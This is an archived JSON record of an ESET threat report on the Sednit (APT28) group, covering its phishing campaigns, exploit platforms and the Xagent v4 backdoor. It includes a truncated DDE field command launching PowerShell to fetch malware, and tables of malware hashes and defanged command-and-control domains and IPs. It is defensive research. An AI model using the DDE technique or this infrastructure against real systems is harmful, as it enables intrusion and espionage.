{ "id": "1d25cd7b-adfa-412c-87ca-5754f0415872", "created_at": "2026-04-06T00:16:07.51865Z", "updated_at": "2026-04-10T03:37:50.109567Z", "deleted_at": null, "sha1_hash": "de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7", "title": "Sednit update: How Fancy Bear Spent the Year", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2908682, "plain_text": "Sednit update: How Fancy Bear Spent the Year\r\nBy ESET Research\r\nArchived: 2026-04-05 22:52:01 UTC\r\nThe Sednit group — also known as Strontium, APT28, Fancy Bear or Sofacy — is a group of attackers operating since 2004,\r\nif not earlier, and whose main objective is to steal confidential information from specific targets.\r\nThis article is a follow-up to ESET’s presentation at BlueHat in November 2017. Late in 2016 we published a white paper\r\ncovering Sednit activity between 2014 and 2016. Since then, we have continued to actively track Sednit's operations, and\r\ntoday we are publishing a brief overview of what our tracking uncovered in terms of the group’s activities and updates to\r\ntheir toolset. The first section covers the update of their attack methodology: namely, the ways in which this group tries to\r\ncompromise their targets systems. The second section covers the evolution of their tools, with a particular emphasis on a\r\ndetailed analysis of a new version of their flagship malware: Xagent.\r\nThe Campaigns\r\nOver the past few years the Sednit group has used various techniques to deploy their various components on targets\r\ncomputers. The attack usually starts with an email containing either a malicious link or malicious attachment. We have seen\r\na shift in the methods they use 'in the course of the year', though. Sedkit was their preferred attack vector in the past, but that\r\nexploit kit has completely disappeared since late 2016. The DealersChoice exploit platform has been their preferred method\r\nsince the publication of our white paper, but we saw other methods being used by this group, such as macros or the use of\r\nMicrosoft Word Dynamic Data Exchange.\r\nThe following three sections will describe the different methods used by Sednit’s operator to gain an initial foothold on a\r\ntarget system. Generally, these campaigns will try to install Seduploader on the target system. Seduploader is a first stage\r\nbackdoor that can be used to assess the target’s importance and download additional malware. If the system is indeed of\r\ninterest to them, it is likely that Sednit’s operators will eventually install Xagent on it.\r\nSedkit (Sednit Exploit Kit)\r\nSedkit was an exploit kit used exclusively by the Sednit group. During its lifetime, Sednit leveraged vulnerabilities in\r\nvarious persistently vulnerable applications, but mostly Adobe Flash and Internet Explorer. When Sedkit was first\r\ndiscovered, potential victims were redirected to its landing page through a watering-hole scheme. Following that campaign,\r\ntheir preferred method consisted of malicious links embedded in emails sent to Sednit’s targets. Sedkit’s workflow is\r\nillustrated below.\r\nBetween August and September 2016, we saw several different email campaigns trying to lure the recipients of their\r\nmessages to a Sedkit landing page. Sedkit’s targets at that time were mostly embassies, and political parties in Central\r\nEurope. The next figure shows an email containing such a URL.\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 1 of 10\n\nThe email tries to fool its recipient into believing that the link will ultimately lead to an interesting news story. In this case,\r\nthe article is supposedly about an earthquake that struck near Rome in August 2016. While the email impersonates someone\r\nthe victim would consider trustworthy, there are two major hints that could lead an attentive recipient to conclude that this\r\nemail is fake. The first one is that there are spelling mistakes (e.g. “Greetigs!”). Spelling mistakes are common in malicious\r\nSednit mails. The second one is the URL’s domain part. It is a purely malicious domain, but the path part of the URL\r\nactually mimics a real, legitimate link. In this particular case, the URL path is the same as one used in a BBC story about\r\nthis earthquake. Again, this is a commonly-used Sednit tactic, using popular stories found on legitimate news websites and\r\nredirecting targets that click on the emailed URL to the real website, but not before visiting the Sedkit landing page. Besides\r\nthe BBC, The Huffington Post is another popular media outlet whose stories they like to use as bait.\r\nThe email shown below, where the link redirects to Sedkit, exhibits several interesting features.\r\nFirstly, the email’s subject and URL path are not aligned: the former refers to Syria and Aleppo while the latter refers to\r\nWADA and Russian hacking. Secondly, there are two glaring spelling mistakes. The first one, is again the use of \"Greetigs!\"\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 2 of 10\n\nand the second one is \"Unated Nations\". Hopefully, someone working for the United Nations’ public relations department\r\nwould not have such a glaring error in their email signature block.\r\nThe last campaign using Sedkit was observed in October 2016. It is interesting to note that the disappearance of Sedkit\r\nfollows a trend we have seen with other exploit kits. Most of these were relying exploits for older versions of Internet\r\nExplorer and/or Flash to perform drive-by downloads. The decline of the majority of exploit kit operations during 2016,\r\nincluding Sednit, could well be attributable to the code hardening performed by Microsoft and Adobe.\r\nFull details of Sedkit's inner workings can be found in our previously published white paper.\r\nDealersChoice\r\nIn August 2016, Palo Alto Networks blogged about a new platform used by Sednit to breach a system initially. This\r\nplatform, which they called DealersChoice, has the ability to generate malicious documents with embedded Adobe Flash\r\nPlayer exploits. There are two variants of this platform. The first one checks which Flash Player version is installed on the\r\nsystem and then selects one of three different vulnerabilities. The second variant will first contact a C\u0026C server which will\r\ndeliver the selected exploit and the final malicious payload. Of course, the second version is much harder to analyze, as the\r\ndocument delivered to the targets does not contain all the pieces of the puzzle.\r\nThis platform is still in use today by Sednit and, like Sedkit, tracks international news stories and includes a reference to\r\nthem in their malicious emails, in an attempt to lure the target into opening the malicious document attachment. Sometimes,\r\nthey also use other, non-political, schemes. In December 2016, they used a rather unusual (for the group) lure:\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 3 of 10\n\nThis email was sent to multiple Ministries of Foreign Affairs and embassies in Europe on December 22nd and 23rd, and\r\ncontained a Word document attachment that appeared to be a Christmas eCard. Note that this was the first time that we saw\r\nthe Sednit group use a non-geopolitical phishing gambit attempting to trap their targets. Of course, the Word document, if\r\nopened, uses DealersChoice to try to compromise the system. Sednit used DealersChoice intensively in late 2016, but the\r\nplatform was not seen for a long time after that. In fact, the first time we saw them use it in 2017 was in October.\r\nWe do not have the email used for this particular campaign, but, based on the decoy document, we can assume that\r\ngovernment agency employees were the targets. Other campaigns using DealersChoice were the subject of different blogs\r\npublished by security researchers. One noteworthy example is the one by Proofpoint where they detail the addition of a new\r\nAdobe Flash Player vulnerability to the DealersChoice platform. This indicates that this platform is still in use by this group\r\nand under constant development.\r\nMacros, VBA and DDE\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 4 of 10\n\nBesides Sedkit and DealersChoice, Sednit’s operators also continued using proven ways to compromise systems they target\r\nby relying on macros in a Microsoft Office documents, but also used other methods. One campaign that grabbed a lot of\r\nattention targeted an Eastern European MFA in April 2017. The following email was sent to an MFA employee:\r\nThe attachment contained code exploiting two zero-days: one local privilege escalation (LPE) and one remote code\r\nexecution (RCE). These two zero-days were reported by ESET to Microsoft. A detailed analysis of this campaign can be\r\nfound on our blog.\r\nThe final case highlighted here illustrates how Sednit’s operators pay close attention to new technical developments in\r\nsecurity. In the beginning of October 2017, SensePost researchers wrote an article on a Microsoft Word methods called the\r\nDynamic Data Exchange (DDE) protocol. DDE is a way to exchange data between applications. For example, it allows a\r\nWord table to be updated with the data contained in an Excel document. It is convenient, but in the case of at least Word and\r\nExcel it can also be used to execute arbitrary code, if the user ignores several warning prompts. Following the publication of\r\nthat article, it did not take long to discover Sednit campaigns using DDE to execute code from a C\u0026C server. In these\r\ncampaigns, documented by McAfee, the decoy document is empty, but it contains a hidden field containing the following\r\ncode:\r\n\"C:\\\\Programs\\\\Microsoft\\\\Office\\\\MSWord.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\r\nIf the intended potential victim opens the document and makes the foolhardy chose to ignore the warnings, the above script\r\nis executed and the Seduploader binary is downloaded from the C\u0026C server and executed on the target’s system.\r\nThis is only a brief overview of how the Sednit operators have been trying to compromise new victims since the publication\r\nof our white paper. As you can see, they are just as active as they were and are still actively targeting governments\r\nworldwide.\r\nTooling\r\nThe previous section shows how the Sednit group spent the last year from the infection-vector point of view. This section\r\ndescribes changes that this group made to their toolset. In 2016, ESET released a deep analysis of each component; it is\r\navailable here.\r\nOver the years the group developed a lot of components to infect, gather and steal information from their targets. Some of\r\nthese components have disappeared since, while others have been improved.\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 5 of 10\n\nSeduploader\r\nSeduploader serves as reconnaissance malware. It is made up of two distinct components: a dropper, and the persistent\r\npayload installed by this dropper. Seduploader is still used by the Sednit group but it has received a few improvements.\r\nDuring the April 2017 campaign a new version of Seduploader came out with some new features, such as a screenshot\r\nfunction or the ability to directly execute loaded into memory from the C\u0026C server. Recently, we have seen the Seduploader\r\ndropper replaced by PowerShell commands delivering the Seduploader payload.\r\nXtunnel\r\nXtunnel is a network proxy tool that can relay any kind of network trace between a C\u0026C server on the Internet and an\r\nendpoint computer inside a local network. Xtunnel is still used by the Sednit group.\r\nSedkit\r\nSedkit is the Sednit exploit-kit; it’s used only for targeted attacks, starting with targeted phishing emails with URLs that\r\nspoof legitimate URLs. October 2016 is the last time we’re aware that Sedkit was used.\r\nSedreco\r\nSedreco serves as a spying backdoor; its functionalities can be extended with dynamically loaded plugins. It is made up of\r\ntwo distinct components: a dropper and the persistent payload installed by this dropper. We have not seen this component\r\nsince April 2016.\r\nUSBStealer\r\nUSBStealer serves as a network tool that extracts sensitive information from air-gapped networks. We have not seen this\r\ncomponent since mid 2015.\r\nXagent\r\nXagent is a modular backdoor with spying functionalities such as keystroke logging and file exfiltration. Xagent is the\r\ngroup's flagship backdoor and heavily used in their operations. Early versions for Linux and Windows were seen years ago,\r\nthen in 2015 an iOS version came out. One year later, an Android version was discovered and finally, in the beginning of\r\n2017, an Xagent sample for OS X was described.\r\nWe saw a new version of the Windows version of Xagent last February. Because of the following strings found in the\r\nbinaries, we deduced that it was version 4 of the backdoor. The different versions of Xagent’s modules are listed in Table 1.\r\nTable 1. Xagent versioning\r\nmodule/channel v3 uid v4 uid\r\nAgentKernel 3303 4401\r\nWinHttp 2111 4402\r\nModuleFileSystem 2103 4411\r\nModuleRemoteKeyLogger 2107 4412\r\nProcessRetranslatorModule 2106 4413\r\nUnknown [1] ?? 4414\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 6 of 10\n\nVersion 4 of Xagent came with new techniques for strings obfuscation and all Run-time type information (RTTI) are\r\nobfuscated as well. These techniques significantly improve the way in which strings are encrypted with a method unique to\r\neach binary. Previous versions of Xagent used an XOR loop to decrypt strings. The new encryption algorithm is a series of\r\noperations with values probably generated at the compile time. The following figure illustrates the complexity of the code.\r\nHowever, the HexRays decompiler does a decent job of simplifying it. Here is an example:\r\nreturn (((((a2 ^ (((((((((((a1 - 13 + 42) ^ 0x7B) + 104) ^ 0x72) - 81 - a2 - 76) ^ 0x31) + 75) ^ 0x3B) + 3) ^ 0x40) + 100\r\nThe AgentKernel can receive commands from the C\u0026C server to interact with modules and channels. Some of the\r\npreviously-seen C\u0026C commands have been removed, and some new ones added.\r\nEarlier versions supported command 2, PING_REQUEST. This has been removed in version 4 but the operator can still get\r\nthe list of modules with the command GET_AGENT_INFO, which is more verbose than the previous command. Commands\r\n34, 35 and 36 showed similarities with SET_PARAMETERS, which allows interaction with LocalStorage, which is the\r\nkernel store. It contains both file-based storage for communication with the C\u0026C server and Microsoft registry base storage\r\nto store various configuration parameters.\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 7 of 10\n\nA new feature implemented in the WinHttp channel is a Domain Generation algorithm (DGA) for fallback domains. The\r\nWinHttp channel is the channel responsible for communicating with the C\u0026C server. Unlike the usual DGA that retrieves its\r\nseed from pseudo-random numbers, this one gets a given seed (probably generated at compilation) for a given sample. The\r\nway that domains are generated is as follows:\r\na suite of operations are applied to the seed\r\nthe result gives an offset for three different arrays (adding another seed for each array)\r\nonce the new offset is calculated (offset + seed), it decrypts the word\r\nall words are concatenated (four words are used to generate the domain; the fourth word came from the first array but\r\nwith a different offset)\r\nthe \".com\" suffix is added.\r\nThe development of the backdoor with the addition of new features and compatibility with all major platforms out there\r\nmake Xagent the core backdoor used by the group.\r\nDealersChoice\r\nDealersChoice is a platform that generates malicious documents containing embedded Adobe Flash files. Palo Alto Network\r\nresearchers analyzed two variants — variant A, which is a standalone variant including Flash exploit code packaged with a\r\npayload, and variant B, which is a modular variant that loads  exploit code on demand. This new component appeared in\r\n2016 and is still in use.\r\nDowndelph\r\nDowndelph is a lightweight downloader developed in the Delphi programming language. As we already mentioned in our\r\nwhite paper, its period of activity was from November 2013 to September 2015 and there have been no new variants seen\r\nsince.\r\nSummary\r\nThe Sednit group is without a doubt still an active group. The main entry point for their flagship backdoor is phishing\r\nemails, and they seem to have a great deal of success with that technique. Xagent is the core of their operation, which we\r\ncan now find on any and all major  platforms, mobile or not. The newest version of Xagent is very interesting and the\r\noperators seem to have put a lot of work into it. We have seen since the discovery two instances of Xagent in the wild — one\r\nwith the channel and the unknown module — one with all modules and channel but without the unknown module. We can\r\nhypothesize that the Sednit group added another layer of checking on its targets by dropping an Xagent with just a few\r\nmodules and if the victim is interesting enough, it will drop another version with all modules.\r\nIoCs\r\nTable 2. Phishing\r\nPhishing document SHA-1 ESET detection\r\nBulletin.doc 68064fc152e23d56e541714af52651cb4ba81aaf Win32/Sednit.AX\r\nf3805382ae2e23ff1147301d131a06e00e4ff75f\r\nWin32/Exploit.CVE-4117.A\r\nOC_PSO_2017.doc 512bdfe937314ac3f195c462c395feeb36932971 Win32/Exploit.Agent\r\nNASAMS.doc 30b3e8c0f3f3cf200daa21c267ffab3cad64e68b Win32/Exploit.Agent\r\nProgramm_Details.doc 4173b29a251cd9c1cab135f67cb60acab4ace0c5 Win32/Exploit.Agent\r\nOperation_in_Mosul.rtf 12a37cfdd3f3671074dd5b0f354269cec028fb52 Win32/Exploit.Agent\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 8 of 10\n\nPhishing document SHA-1 ESET detection\r\nARM-NATO_ENGLISH_30_NOV_2016.doc 15201766bd964b7c405aeb11db81457220c31e46 SWF/Agent.L\r\nOlympic-Agenda-2020-20-20-Recommendations.doc 8078e411fbe33864dfd8f87ad5105cc1fd26d62e Win32/Exploit.Agent\r\nMerry_Christmas!.docx 33447383379ca99083442b852589111296f0c603 Win32/Exploit.Agent\r\nTrump’s_Attack_on_Syria_English.docx d5235d136cfcadbef431eea7253d80bde414db9d Win32/Exploit.Agent\r\nHotel_Reservation_Form.doc f293a2bfb728060c54efeeb03c5323893b5c80df Win32/Sednit.BN\r\nSB_Doc_2017-\r\n3_Implementation_of_Key_Taskings_and_Next_Steps.doc\r\nbb10ed5d59672fbc6178e35d0feac0562513e9f0 Win32/Sednit.BN\r\n4873bafe44cff06845faa0ce7c270c4ce3c9f7b9\r\n169c8f3e3d22e192c108bc95164d362ce5437465\r\ncc7607015cd7a1a4452acd3d87adabdd7e005bd7\r\nWin32/Sednit.BN\r\nCaucasian_Eagle_ENG.docx 5d2c7d87995cc5b8184baba2c7a1900a48b2f42d Win32/Exploit.Agent\r\nWorld War3.docx 7aada8bcc0d1ab8ffb1f0fae4757789c6f5546a3\r\nSWF/Exploit.CVE-20\r\n11292.A\r\nSaberGuardian2017.docx 68c2809560c7623d2307d8797691abf3eafe319a VBA/DDE.E\r\nIsisAttackInNewYork.docx 1c6c700ceebfbe799e115582665105caa03c5c9e VBA/DDE.L\r\nTable 3. Seduploader Samples\r\nSHA-1 ESET detection C\u0026C server\r\n9f6bed7d7f4728490117cbc85819c2e6c494251b Win32/Sednit.AX servicecdp[.]com:87.236.211[.]182\r\n6e167da3c5d887fa2e58da848a2245d11b6c5ad6 Win32/Sednit.BG\r\nrunvercheck[.]com:185.156.173[.]70\r\nremsupport[.]org:191.101.31[.]96\r\ne338d49c270baf64363879e5eecb8fa6bdde8ad9 Win32/Sednit.BG wmdmediacodecs[.]com:95.215.45[.]43\r\nf9fd3f1d8da4ffd6a494228b934549d09e3c59d1 Win32/Sednit.BN\r\nmvband[.]net:89.45.67[.]144\r\nmvtband[.]net:89.33.246[.]117\r\n476fc1d31722ac26b46154cbf0c631d60268b28a Win32/Sednit.BN viters[.]org:89.187.150[.]44\r\n8a68f26d01372114f660e32ac4c9117e5d0577f1 Win32/Sednit.BN myinvestgroup[.]com:146.185.253[.]132\r\n9c47ca3883196b3a84d67676a804ff50e22b0a9f Win32/Sednit.BR space-delivery[.]com:86.106.131[.]141\r\nab354807e687993fbeb1b325eb6e4ab38d428a1e Win32/Sednit.BS satellitedeluxpanorama[.]com:89.34.111[.]160\r\n4bc722a9b0492a50bd86a1341f02c74c0d773db7 Win32/Sednit.BS webviewres[.]net:185.216.35[.]26\r\nTable 4. Xagent Samples\r\nSHA-1 ESET detection C\u0026C server\r\n6f0fc0ebba3e4c8b26a69cdf519edf8d1aa2f4bb Win64/Sednit.Z movieultimate[.]com\r\ne19f753e514f6adec8f81bcdefb9117979e69627 Win64/Sednit.Z meteost[.]com\r\n961468ddd3d0fa25beb8210c81ba620f9170ed30 Win32/Sednit.BO faststoragefiles[.]org\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 9 of 10\n\nSHA-1 ESET detection C\u0026C server\r\na0719b50265505c8432616c0a4e14ed206981e95 Win32/Sednit.BO nethostnet[.]com\r\n2cf6436b99d11d9d1e0c488af518e35162ecbc9c Win64/Sednit.Y faststoragefiles[.]org\r\nfec29b4f4dccc59770c65c128dfe4564d7c13d33 Win64/Sednit.Y fsportal[.]net\r\n57d7f3d31c491f8aef4665ca4dd905c3c8a98795 Win64/Sednit.Z fastdataexchange[.]org\r\na3bf5b5cf5a5ef438a198a6f61f7225c0a4a7138 Win32/Sednit.BO newfilmts[.]com\r\n1958e722afd0dba266576922abc98aa505cf5f9a Win32/Sednit.BO newfilmts[.]com\r\n[1] We weren't able to match this module with previous well-known modules\r\nSource: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE", "ETDA" ], "references": [ "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" ], "report_names": [ "sednit-update-fancy-bear-spent-year" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434567, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7.pdf", "text": "https://archive.orkl.eu/de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7.txt", "img": "https://archive.orkl.eu/de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7.jpg" } }